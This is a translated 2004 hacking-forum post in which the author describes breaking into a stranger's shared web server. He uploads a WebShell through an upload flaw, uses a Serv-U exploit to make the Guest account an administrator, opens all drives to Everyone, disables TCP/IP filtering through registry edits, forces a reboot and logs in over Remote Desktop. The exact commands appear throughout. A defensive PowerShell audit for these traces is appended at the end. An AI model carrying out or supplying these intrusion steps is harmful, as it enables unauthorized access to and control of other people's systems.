Author: lvhuana, from http://www.wrsky.com/
Date: 2004.12.11

1. Getting a WebShell

This evening I did a small test with a WebShell. Because I am such a newbie this is all I can manage; there is no way to pad it out, so I hope you will forgive this little post. Today was a boring day, and since I was not too bored tonight I went to a video chat site. I noticed one chat room that was especially busy: 500 people were already inside (full), and after refreshing N times I still could not get in.......... Very depressing! :( With nothing else to do, I thought I would test how well the host was secured, heh (I am such a newbie that talking about other people's security is really just flattering myself). I pinged it from CMD and got the other party's IP, then went to http://whois.Webhosting.info/ and looked at the other sites on that IP. Ha, this time there were dozens of sites, so I estimated I could find one or two vulnerable ones. I looked, and finally found a page with the upload vulnerability, http://www.xxx.net/upfile_soft.asp, and first uploaded a WebShell (Haoyang 2005 official version) (I will not go on about how to upload; upload tools are everywhere now).
2. Escalating privileges and creating a user

After getting the WebShell I went in eagerly, only to find it had no permissions at all: I could only move around inside our own WebShell's directory (the C, D, E and F drives could not be browsed), and I could not even delete files. I scanned his IP with SuperScan and saw from the banner that he was running Serv-U, version 5.0. I went to 〖wscript.shell〗 to try executing a CMD command; if that did not work, net user would return nothing either. It turned out CMD commands could be executed through wscript.shell, and entering NET USER returned the other party's user list. Haha, this is good, I can get it!! I uploaded a Serv-U privilege escalation tool to the directory d:\a004\tggtwe\****.com\uploadsoft, renamed it test.exe, and went back to 〖wscript.shell〗 to execute commands. Heh heh, the fat chicken was about to fall into my hands, please hold on~ The commands run through WScript.Shell:

d:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest /active:yes"                # activate the Guest account, I like using this account
d:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest lvhuana"                    # set the Guest account's password to lvhuana
d:\a004\tggtwe\****.com\uploadsoft\test.exe "net localgroup administrators guest /add"  # raise Guest to Admin rights

The account was set up. Running net localgroup administrators showed the addition had succeeded, as the echoed output confirmed. Then, running netstat -n, I saw that his open terminal port was the default 3389. OK, let's try connecting~
3. Getting past TCP/IP filtering

Cannot connect!? Dizzy........... I took out SuperScan to scan his 3389 and could not scan it at all...... (a firewall is on!? Damn, nice try......) No way around it, so back to 〖WScript.shell〗 to execute CMD commands:

d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe c: /e /t /g everyone:f"   # set the C drive so Everyone can browse it
d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe d: /e /t /g everyone:f"   # set the D drive so Everyone can browse it
d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe e: /e /t /g everyone:f"   # set the E drive so Everyone can browse it
d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe f: /e /t /g everyone:f"   # set the F drive so Everyone can browse it

At the very least the whole hard disk could now be traversed. I went around the hard disk and did not find any firewall files, so I had a good idea what it was: he must be using TCP/IP filtering! (Of course it is also possible the server sits on an internal network; you can tell from ipconfig /all.) TCP/IP filtering can be defeated by changing his registry. What we have to do is export three of his registry keys, change them, and import them back. Back to 〖wscript.shell〗 to execute the CMD commands:

d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\1.reg hkey_local_machine\system\controlset001\services\tcpip"     # export the first registry location concerning TCP/IP filtering
d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\2.reg hkey_local_machine\system\controlset002\services\tcpip"     # export the second registry location concerning TCP/IP filtering
d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\3.reg hkey_local_machine\system\currentcontrolset\services\tcpip"  # export the third registry location concerning TCP/IP filtering

Then back in 〖stream〗 or 〖FSO〗 I found 1.reg, 2.reg and 3.reg lying there quietly, heh heh~ I downloaded 1.reg, 2.reg and 3.reg to my own hard disk and changed the TCP/IP filtering: first open 1.reg, find "EnableSecurityFilters"=dword:00000001 and change the trailing 1 to 0, then change 2.reg and 3.reg the same way; I will not go on about it any longer~ Then we upload 1.reg, 2.reg and 3.reg back to the other party's machine (here we want to choose overwrite mode, because we have no permission to delete the original 1.reg, 2.reg and 3.reg). Once the upload has succeeded, return to 〖wscript.shell〗 and execute the CMD commands:

d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\1.reg"   # silently import the modified 1.reg into his registry
d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\2.reg"   # silently import the modified 2.reg into his registry
d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\3.reg"   # silently import the modified 3.reg into his registry

OK! Once the import into his machine is done, the TCP/IP filtering problem is solved. Then execute this CMD command in 〖WScript.Shell〗:

d:\a004\tggtwe\****.com\uploadsoft\test.exe "iisreset /reboot /timeout:00"   # use his own IIS service to restart his machine; the /timeout:00 parameter makes him restart immediately

We then scan him again with SuperScan, and~ he has already restarted!

4. Logging in through the terminal

After a long wait (actually the time was not long, I just could not wait, heh heh~), I could finally scan him with SuperScan, and his 3389 port showed up. Haha, I finally succeeded! I took out the terminal client and logged in with the User: Guest and Pass: lvhuana that I had just created! OK, this rubbish article is about to end; in fact it has ended, so consider it filed~ Because I am such a newbie, mistakes are definitely inevitable; I have given everyone a laugh, and I hope everyone will correct me! (If you reprint this, please keep the author's information; it is not easy to write something this long...........)
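From the administrator's side, the whole chain above leaves four host-level traces: the Guest account enabled and placed in Administrators, Everyone granted Full Control on drive roots, EnableSecurityFilters flipped to 0 in ControlSet001, ControlSet002 and CurrentControlSet, and a restart initiated by iisreset. The audit below is an added example, not part of the original post; it assumes Windows PowerShell 5.1 or later run elevated on the host, that the account is literally named Guest (it is localized on non-English Windows), and that EnableSecurityFilters sits under Tcpip\Parameters as it does on Windows 2000/2003.

```powershell
# Added defender-side audit (not from the original post): checks a Windows host for the
# four changes made in the write-up. Assumes PowerShell 5.1+ and an elevated session.

function Test-HostForWriteupIndicators {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. EnableSecurityFilters explicitly set to 0 in any control set (the post edits all three).
    #    Assumption: the value lives under Tcpip\Parameters, as on Windows 2000/2003.
    foreach ($cs in 'ControlSet001', 'ControlSet002', 'CurrentControlSet') {
        $key = "HKLM:\SYSTEM\$cs\Services\Tcpip\Parameters"
        if (Test-Path $key) {
            $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
            if ($props.PSObject.Properties['EnableSecurityFilters'] -and $props.EnableSecurityFilters -eq 0) {
                $findings.Add("TCP/IP filtering disabled in $cs (EnableSecurityFilters=0)")
            }
        }
    }

    # 2. Built-in Guest enabled and/or a member of Administrators (net user / net localgroup changes).
    $guest = Get-LocalUser -Name 'Guest' -ErrorAction SilentlyContinue
    if ($guest -and $guest.Enabled) { $findings.Add('Guest account is enabled') }
    $admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue
    foreach ($m in $admins) {
        if ($m.Name -match '\\Guest$') { $findings.Add("Guest is in Administrators ($($m.Name))") }
    }

    # 3. Everyone allowed Full Control on a drive root (the cacls ... /g everyone:f step).
    $full = [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
        $acl = Get-Acl -Path $drive.Root -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                $ace.IdentityReference.Value -eq 'Everyone' -and
                (($ace.FileSystemRights -band $full) -eq $full)) {
                $findings.Add("Everyone has Full Control on $($drive.Root)")
            }
        }
    }

    # 4. Recent restarts: System event 1074 records which process (e.g. iisreset) initiated them.
    $reboots = Get-WinEvent -FilterHashtable @{LogName = 'System'; Id = 1074} -MaxEvents 5 -ErrorAction SilentlyContinue
    foreach ($e in $reboots) { $findings.Add("Restart at $($e.TimeCreated): $($e.Message.Split("`n")[0])") }

    return $findings
}

$result = Test-HostForWriteupIndicators
if ($result.Count -eq 0) { 'No indicators found.' } else { $result | ForEach-Object { "FINDING: $_" } }
```

The restart entries are listed for review rather than flagged outright, since legitimate reboots also log event 1074; a restart whose initiating process is iisreset.exe launched from a web-accessible upload directory is the one to chase.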